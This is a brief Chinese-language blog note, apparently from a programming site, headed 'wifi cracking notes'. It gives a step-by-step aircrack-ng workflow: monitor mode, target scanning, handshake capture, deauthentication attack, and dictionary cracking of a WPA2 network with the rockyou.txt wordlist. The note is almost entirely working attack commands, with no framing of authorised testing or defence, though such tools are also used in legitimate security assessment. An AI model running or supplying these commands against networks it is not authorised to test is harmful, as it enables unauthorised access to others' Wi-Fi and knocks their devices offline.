1. 程式人生 > >wifi 破解筆記

wifi 破解筆記

  • 插上就萬事俱備了 iwconfig 掃描網絡卡 預設的基本上都是wlan0了 airmon-ng check kill 乾死幹繞監聽的程序 airmon-ng check 開啟監聽 airmon-ng start wlan0 開始監聽wlan0 airodump-ng wlan0 選擇攻擊物件 airodump-ng --bssid (物件)–channel (物件)–write/root/ wlan0mon記錄目標的封包,就是握手包 aireplay-ng -0 10 -a (物件)-c MAC wlan0mon -e (wifi名稱) 反向認證 aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap
    跑字典